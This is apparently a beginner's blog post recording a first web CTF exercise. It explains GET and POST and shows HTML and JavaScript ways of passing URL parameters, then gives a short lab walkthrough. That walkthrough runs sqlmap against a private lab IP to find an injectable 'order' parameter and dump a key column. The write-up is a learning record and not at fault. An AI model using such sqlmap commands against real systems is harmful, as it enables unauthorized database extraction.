我的第一道web类CTF题——一起来撸猫o(=•ェ•=)m-CSDN博客
最开始学习CTF里的web方向时,每次做了题遇到类似的老是忘记之前的解法,所以写点东西记录一下。听大哥的话,就从最开始的GET传参开始吧!!!(大部分都是只得其法,不得其理。希望以后学了更多后能补充上原理)
寻求度娘知,GET和POST 是 HTTP 协议中两种请求方式,而HTTP协议是一个简单的请求-响应协议(具体详见HTTP_百度百科)
GET和POST 是 HTTP 请求中常用的两种请求方法,它们的底层都是基于 TCP/IP 实现的。但是由于 HTTP 的规定以及浏览器/服务器的限制,导致它们在应用过程中可能会有所不同。
GET和POST是HTTP协议中最常用的两种请求方法,它们在许多方面存在差异。
总的来说,GET和POST请求在许多方面存在差异,需要根据具体的使用场景来选择合适的请求方法。
GET和POST的区别以及传参详细解说_post传参-CSDN博客文章浏览阅读1.7w次,点赞10次,收藏72次。文章目录前言一、get和post的区别1、w3school 标准答案2、GET、POST 请求报文上的区别二、传参1.get传参2.post传参传入参数json传入参数data传入参数params总结前言该文章为自己学习及经验总结,里面可能会有不准确的地方,后续会不断的修正文章内容主要针对软件测试人员需要掌握的范围一、get和post的区别1、w3school 标准答案2、GET、POST 请求报文上的区别GET 和 ._post传参https://blog.csdn.net/m0_47801456/article/details/123684379
< html xmlns = "http://www.w3.org/1999/xhtml" >
< head >
< meta http-equiv = "Content-Type" content = "text/html; charset=utf-8" />
< title > title >
< script type = "text/javascript" >
function Go() {
window.location.href="localhost:21811/Handler1.ashx?id=1&name='abc'"
}
script >
head >
< body >
1、直接在URL后面加参数:
localhost:21811/Handler1.ashx?id=1&name="abc"
2、用超链接的方法传递参数:
当点击超链接的时候,首先会跳转到localhost:21811/Handler1.ashx页面,然后还会传递id 和name 两个参数过去
< a href = "localhost:21811/Handler1.ashx?id=1&name='abc'" >超链接传递参数 a > body >
3、通过js方法传递:
用户点击这个button按钮,触发onClick事件,执行Go()方法,跳转到localhost:21811/Handler1.ashx页面,同时传递了id,和name两个参数过去
< input type = "button" onclick = "Go()" value = "通过js方法传递参数" />
4、
通过form表单传递:
<
form
action
=
"Handler1.ashx"
method
=
"get"
>
注意action里面的连接不能带参数的
< form action = "Handler1.ashx" method = "get" > >
< input type = "text" name = "id" value = "3" />
< input type = "text" name = "name" value = "abc" />
< input type = "submit" value = "通过传递参数" />
form >
body >
html >
题目:小试牛刀
Step1:利用http://172.16.15.193/stage/9/get_info.php?title=xiaoshiniudao&order=id
这个网址跑sqlmap,提示title不是注入点。
Step2:此题为get传参,参数可以删减。猜测注入点为order。
sqlmap -u http://172.16.15.193/stage/9/get_info.php?order=id --dbs
Step3:数据库为inject_xiaoshiniudao2,爆表,列过程已省略。
查字段:
sqlmap -u http://172.16.15.192/stage/5/get_info.php?order=id -D inject_xiaoshiniudao2 -T key_1 -C thekey --dump